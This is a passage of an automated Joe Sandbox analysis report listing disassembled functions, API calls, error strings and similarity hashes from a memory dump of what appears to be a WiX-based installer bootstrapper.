Function 00CA1F8A Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 222sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA1C48: RegCloseKey.ADVAPI32(?,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001,?,?,?,00CA1FA6,00000000,?,?,?), ref: 00CA1CD5

Sleep.KERNEL32(000007D0,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000,?,?,?), ref: 00CA2035

Strings

Failed to copy log extension to extension., xrefs: 00CA218E
Setup, xrefs: 00CA1FEA
Failed to copy log path to prefix., xrefs: 00CA216F
log, xrefs: 00CA1FE4
Failed to open log: %ls, xrefs: 00CA20AF
Failed to get non-session specific TEMP folder., xrefs: 00CA20E7
Failed to get current directory., xrefs: 00CA2021
Failed to copy full log path to prefix., xrefs: 00CA21A9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$log
API String ID: 2834455192-2818506709
Opcode ID: b3c9cd5557f16ae6d06a6d5b3e635fec34c230cb9f4e8f677f6ec9182865f483
Instruction ID: 587972be81db348200a5d8924fd995ebbcff7b31e559387a569ae925804ebbfd
Opcode Fuzzy Hash: b3c9cd5557f16ae6d06a6d5b3e635fec34c230cb9f4e8f677f6ec9182865f483
Instruction Fuzzy Hash: B8716F71900217EFCF14AFA8CC81AADBBB9EF06308F64442AFB11A7151D7709E91EB51

Function 00CA6385 Relevance: 13.6, APIs: 9, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00CA63A1
DefWindowProcW.USER32(?,00000082,?,?), ref: 00CA63D9
SetWindowLongW.USER32(?,000000EB,00000000), ref: 00CA63E6
SetWindowLongW.USER32(?,000000EB,?), ref: 00CA63F5
DefWindowProcW.USER32(?,?,?,?), ref: 00CA6403
_memset.LIBCMT ref: 00CA6418
BeginPaint.USER32(?,?), ref: 00CA6425
EndPaint.USER32(?,?), ref: 00CA6436
PostQuitMessage.USER32(00000000), ref: 00CA6440

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Window$Long$PaintProc$BeginMessagePostQuit_memset
String ID:
API String ID: 527712210-0
Opcode ID: 4f14f049fe1fcd9382b1a8fd17478027fc9b094a532b1dd6dfd836287001fbab
Instruction ID: a3eb559335f0e08154cd24ccb3167d140e394ce65e5ca71a9971107138a5d804
Opcode Fuzzy Hash: 4f14f049fe1fcd9382b1a8fd17478027fc9b094a532b1dd6dfd836287001fbab
Instruction Fuzzy Hash: 2821AF7250414AABCB11EFA89D8AF7E3778FB4A719F580515FA22D60B0CB34DE019721

Function 00CA97CB Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 199COMMON

Download Yara Rule

APIs

Part of subcall function 00C9A528: EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,00CA9714,?,WixBundleOriginalSource,?,00000000,?,?,00000001,?,?,00000001), ref: 00C9A536
Part of subcall function 00C9A528: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,00CA9714,?,WixBundleOriginalSource,?,00000000,?,?,00000001,?,?,00000001), ref: 00C9A598

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00CA98FE

Strings

Failed to get path to current process., xrefs: 00CA987C
Failed to get current process directory., xrefs: 00CA9899
WixBundleLastUsedSource, xrefs: 00CA9824
WixBundleOriginalSource, xrefs: 00CA983F
Failed to copy source path., xrefs: 00CA9994
Failed to combine last source with source., xrefs: 00CA98B7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$CompareEnterLeaveString
String ID: Failed to combine last source with source.$Failed to copy source path.$Failed to get current process directory.$Failed to get path to current process.$WixBundleLastUsedSource$WixBundleOriginalSource
API String ID: 2612025200-10224182
Opcode ID: 7f6194c3844c45747b140d43d6c3195f3680a2ce7fe12d0d9a06e1dd5d317254
Instruction ID: 66806afd4195a91199975a0b698345f0e7ac6b67da13451b8ccd1438aa3c0964
Opcode Fuzzy Hash: 7f6194c3844c45747b140d43d6c3195f3680a2ce7fe12d0d9a06e1dd5d317254
Instruction Fuzzy Hash: 87711871C0021AEFCF10EFE5C8829EEBBB4FB0A318F64456EE615B2191D7349A44DB51

Function 00CB7170 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 161networkCOMMON

Download Yara Rule

APIs

HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB7183
GetLastError.KERNEL32(?,?,?,00CB7457,00000000,?,00000000,?,00000000,00000000,00000001,?), ref: 00CB718D

Strings

Failed to get HTTP status code for request to URL: %ls, xrefs: 00CB7320
Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 00CB71A5
Failed to get redirect url: %ls, xrefs: 00CB7329
Failed to get HTTP status code for failed request to URL: %ls, xrefs: 00CB71C5
Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00CB7227

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHttpLastRequestSend
String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls
API String ID: 4088757929-2903077892
Opcode ID: 6ee20e7f1131c0462b3abef766f7efff06730e21c56717968f9c448fdc363f7a
Instruction ID: e3ec3f9e37a322937a5a2195a95d4536a07752f926476c91607aade54c926d86
Opcode Fuzzy Hash: 6ee20e7f1131c0462b3abef766f7efff06730e21c56717968f9c448fdc363f7a
Instruction Fuzzy Hash: 3341067194C52AE7DB354A98CD49FEF66A8EF80750F660325FC11DB660E264CF40A3E2

Function 00C97251 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,?,00020006,00000000,00000000,00000000,?,00000000,00000001), ref: 00C97381
RegCloseKey.ADVAPI32(00000001,00000000,00000000,?,?,00020006,00000000,00000000,00000000,?,00000000,00000001), ref: 00C9738E

Part of subcall function 00CC3D8C: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00C913BB,?,?,00000001,?,00C972CB,?,00C913BB,00020006,00000001), ref: 00CC3DB0

Strings

%ls.RebootRequired, xrefs: 00C972A5
Failed to delete registration key: %ls, xrefs: 00C97331
Failed to write volatile reboot required registry key., xrefs: 00C972CF
Failed to open registration key., xrefs: 00C973BF
Failed to update resume mode., xrefs: 00C97366

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
API String ID: 359002179-2517785395
Opcode ID: e381b29044df56341df2297279ee6568f9f34239ff649e431fa9d8c301ea6779
Instruction ID: ca057682290b658437d54647654f2c2f1a59bffc70cc2da8bdc9b0cd3d8c9981
Opcode Fuzzy Hash: e381b29044df56341df2297279ee6568f9f34239ff649e431fa9d8c301ea6779
Instruction Fuzzy Hash: 4E41BD72915609FFCF216FA0DC8AEAE7BBABF00304F14453EF911A2021D7319A50BB51

Function 00CBFD97 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00CE7E3C), ref: 00CBFDDB
_memset.LIBCMT ref: 00CBFDF3
GetComputerNameW.KERNEL32(?,?), ref: 00CBFE33

Strings

Executable: %ls v%d.%d.%d.%d, xrefs: 00CBFE8D
Computer : %ls, xrefs: 00CBFE9F
=== Logging started: %ls ===, xrefs: 00CBFE5C
--- logging level: %hs ---, xrefs: 00CBFEE9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Name$ComputerFileModule_memset
String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
API String ID: 1941974936-3153207428
Opcode ID: 17f863eb9a8d0047b65fdcdc8e77c1811c0d2ea9038b56c52c870e3b8b853a58
Instruction ID: 6c7b25f0876f1d6971fe6cbd321b288f3ce3c9a64890a8ea5dd24183365756c4
Opcode Fuzzy Hash: 17f863eb9a8d0047b65fdcdc8e77c1811c0d2ea9038b56c52c870e3b8b853a58
Instruction Fuzzy Hash: 12416FB290015CABCB21DF65AC85FEE73BCAB04304F5040B9E605E7252DA309F86DBA4

Function 00C95693 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,00000000,00000001,?,000000F9,00000001,?,00000105,00000000,?,?), ref: 00C957AB
RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,00000000,00000001,?,000000F9,00000001,?,00000105,00000000,?,?), ref: 00C957B8

Strings

Failed to read Resume value., xrefs: 00C95746
%ls.RebootRequired, xrefs: 00C956A7
Resume, xrefs: 00C95726
Failed to format pending restart registry key to read., xrefs: 00C956C7
Failed to open registration key., xrefs: 00C9571B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 7a1654e1b9e1a694c0c7f03e29cca767f8a405faeceef942b1ef6b35fdb8fa61
Instruction ID: 399416b4cf5e410b9841d6f7196368038066446ad1994baa861ba9558edc04ee
Opcode Fuzzy Hash: 7a1654e1b9e1a694c0c7f03e29cca767f8a405faeceef942b1ef6b35fdb8fa61
Instruction Fuzzy Hash: E3417E75920A08EFCF129FD5C8C9EAEB7B9FB44310F55806AF916AB251D7709F409B20

Function 00CA99F9 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 113COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,7FFFFFFF,?,?,7FFFFFFF,?,00000000,?,00000000), ref: 00CA9A7A
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,00CB2A82,000000FF,00CB2A82,WixBundleLastUsedSource,00CB2A82,?,?,?,?,?,00CB2A82,?), ref: 00CA9AC1

Strings

WixBundleLastUsedSource, xrefs: 00CA9A9E, 00CA9AA3, 00CA9ADD
Failed to determine length of source path., xrefs: 00CA9A2A
Failed to set last source., xrefs: 00CA9AED
Failed to determine length of relative path., xrefs: 00CA9A49
Failed to trim source folder., xrefs: 00CA9A93

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 1825529933-660234312
Opcode ID: 161be116c1fb02ed50482273956cbf06a79922a873edbb90a6ec325650bd1efa
Instruction ID: e7adffed88c278d1dd8987f2be97a5c3ba0aa5bb4853e0a5224bab9850f1f5f1
Opcode Fuzzy Hash: 161be116c1fb02ed50482273956cbf06a79922a873edbb90a6ec325650bd1efa
Instruction Fuzzy Hash: 56319E3190021ABBCF11DF95CC46FDEBBB9EB56324F208526F525E61D0EB709A41AB60

Function 00C9F5C7 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9F5DE

Strings

Failed to find package: %ls, xrefs: 00C9F628
Failed to copy installed ProductCode., xrefs: 00C9F693
Failed to read package id from message buffer., xrefs: 00C9F606
Failed to read installed version from message buffer., xrefs: 00C9F674
Failed to load compatible package., xrefs: 00C9F6C4
Failed to read installed ProductCode from message buffer., xrefs: 00C9F654

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to copy installed ProductCode.$Failed to find package: %ls$Failed to load compatible package.$Failed to read installed ProductCode from message buffer.$Failed to read installed version from message buffer.$Failed to read package id from message buffer.
API String ID: 2102423945-2628348887
Opcode ID: c2779b4ee69a046b2e3c67205f31c1b1267545cd5e80cdcd2673ba7bf5ab8be4
Instruction ID: e344c3bc49c4f8b120832b6613d4dab8ba9d00ee8cc627351dae4cb22f015738
Opcode Fuzzy Hash: c2779b4ee69a046b2e3c67205f31c1b1267545cd5e80cdcd2673ba7bf5ab8be4
Instruction Fuzzy Hash: 1A317232900218FBCF11EBA4DD45EEEBBB8AF59310F10407AFA14F7121D7319A52AB50

Function 00C93D1B Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C94D26: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,00000000,00000000,?,?,?,00C9F1C5,?,?,?,?), ref: 00C94D4B

CreateFileW.KERNEL32(00C92232,80000000,00000005,00000000,00000003,08000000,00000000,00C92232,E8530674,00000000,00C91E8E,15FF3675,00C91F0E,00C91AA6,00C91E22,00000000), ref: 00C93D83

Part of subcall function 00CA8CA0: _memset.LIBCMT ref: 00CA8CFA

GetLastError.KERNEL32 ref: 00C93DCC

Strings

Failed to get catalog local file path, xrefs: 00C93DBD
Failed to verify catalog signature: %ls, xrefs: 00C93E05
Failed to open catalog in working path: %ls, xrefs: 00C93DFB
Failed to find payload for catalog file., xrefs: 00C93DB6
catalog.cpp, xrefs: 00C93DEE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareCreateErrorFileLastString_memset
String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 3205693548-48089280
Opcode ID: 3be57397bdaadf92532c8888ab459090144788794f15ce6b5596ed7f91bc6e1a
Instruction ID: e0f9fbcb7850eeff9e11f8ba3b15efb7b66e6ed2fd0b7d97196ba24f2d32c0f2
Opcode Fuzzy Hash: 3be57397bdaadf92532c8888ab459090144788794f15ce6b5596ed7f91bc6e1a
Instruction Fuzzy Hash: 8F312536940605FFCF119B99CC8AF5EBBB5EF80710F214029F919AB290E731EB41AB40

Function 00CB4F72 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,?,00000000), ref: 00CB4F90
ReleaseMutex.KERNEL32(?), ref: 00CB4FB0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB4FF2
ReleaseMutex.KERNEL32(?), ref: 00CB5005
SetEvent.KERNEL32(?), ref: 00CB500E

Strings

Failed to get message from netfx chainer., xrefs: 00CB5029
Failed to send files in use message from netfx chainer., xrefs: 00CB504F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: 73ec07a075cb2766b56adce8c02f791b8e84d00cba35d0a027f1a1a2bf98df17
Instruction ID: 3cd1c35e73d7ebbc8df5582962dd2c6ec21d3ef7eebcefe221f9a6dedf670fb7
Opcode Fuzzy Hash: 73ec07a075cb2766b56adce8c02f791b8e84d00cba35d0a027f1a1a2bf98df17
Instruction Fuzzy Hash: A2310731500604AFCF22ABA9DC49FEEFFB5FF44320F148529E525A61A1DB31D945DB50

Function 00C97533 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97548
GetFileAttributesW.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,00C98BD7,?,?,?), ref: 00C9755D
GetLastError.KERNEL32(?,00C98BD7,?,?,?), ref: 00C97568

Strings

Failed while searching directory search: %ls, for path: %ls, xrefs: 00C975C7
Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00C975DD
Failed to set directory search path variable., xrefs: 00C9759A
Failed to format variable string., xrefs: 00C97553

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: 086940a748adda3317bc6459044e9b3c1f8ab481c6d4c7a5fee7ff1635856546
Instruction ID: ed872cf00de4181ae7c789818463a41b914c4d9401bc447ac362d8809f7a2479
Opcode Fuzzy Hash: 086940a748adda3317bc6459044e9b3c1f8ab481c6d4c7a5fee7ff1635856546
Instruction Fuzzy Hash: 2621F332966125FBDF626A94CE0AF9D7A259F00B20F224338F814A61A0D7258F50B7D1

Function 00C97795 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C977AA
GetFileAttributesW.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,00C98BB4,?,?,?), ref: 00C977BF
GetLastError.KERNEL32(?,00C98BB4,?,?,?), ref: 00C977CA

Strings

Failed to set variable to file search path., xrefs: 00C97823
File search: %ls, did not find path: %ls, xrefs: 00C97837
Failed to format variable string., xrefs: 00C977B5
Failed while searching file search: %ls, for path: %ls, xrefs: 00C977F9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: b1242e0ca947d3e5afe6a12d6d84585557bb1db7303de6fd24b820d2677c6e0c
Instruction ID: 29ccf9f98bb87db4272c6a8741f481abe4c31b4745c97988a05f6b8af5ff43f5
Opcode Fuzzy Hash: b1242e0ca947d3e5afe6a12d6d84585557bb1db7303de6fd24b820d2677c6e0c
Instruction Fuzzy Hash: 6111C032996121FADF126A94CD0EF9D7B25DF00761F200238F920B61E1D7669F51F6C9

Function 00CA78CA Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA78EE
GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 00CA7902
GetLastError.KERNEL32(?,?,?), ref: 00CA790C

Strings

Failed to get temp path for working folder., xrefs: 00CA793B
%ls%ls\, xrefs: 00CA794A
Failed to append bundle id on to temp path for working folder., xrefs: 00CA795E
cache.cpp, xrefs: 00CA7931

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastPathTemp_memset
String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to get temp path for working folder.$cache.cpp
API String ID: 623060366-3390808230
Opcode ID: 57b535b2b09ae7b5f518ded45e2da5780cc2f0d35273f0e6cc1d2fec56e134e3
Instruction ID: a441842bd2786f3c9034a5d2caab0d9e34b9eb16aa27b232dfd83f83d6f881e3
Opcode Fuzzy Hash: 57b535b2b09ae7b5f518ded45e2da5780cc2f0d35273f0e6cc1d2fec56e134e3
Instruction Fuzzy Hash: F1012B71A4432566E320A764DC47FAF379CAF01B25F1002AAF914F6282FA648E0496D5

Function 00C9E916 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000493E0,00000000,?,?,00CA12AC,00000000,?,00CA0F5D,?,00000000,?,?,?,00C91DEA,?), ref: 00C9E928
GetLastError.KERNEL32(?,?,00CA12AC,00000000,?,00CA0F5D,?,00000000,?,?,?,00C91DEA,?,?), ref: 00C9E932
GetExitCodeThread.KERNEL32(?,?,?,?,00CA12AC,00000000,?,00CA0F5D,?,00000000,?,?,?,00C91DEA,?,?), ref: 00C9E96F
GetLastError.KERNEL32(?,?,00CA12AC,00000000,?,00CA0F5D,?,00000000,?,?,?,00C91DEA,?,?), ref: 00C9E979

Strings

Failed to wait for cache thread to terminate., xrefs: 00C9E961
elevation.cpp, xrefs: 00C9E957, 00C9E99E
Failed to get cache thread exit code., xrefs: 00C9E9A8

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: 8a5feaa099b7e2919b990412ae79262b8e1dd705bc28ae9e2ce561015bd78573
Instruction ID: f9ef5deef4a22871858158247cbfb844ee1c86f132f9500c1c5015cd771bb88e
Opcode Fuzzy Hash: 8a5feaa099b7e2919b990412ae79262b8e1dd705bc28ae9e2ce561015bd78573
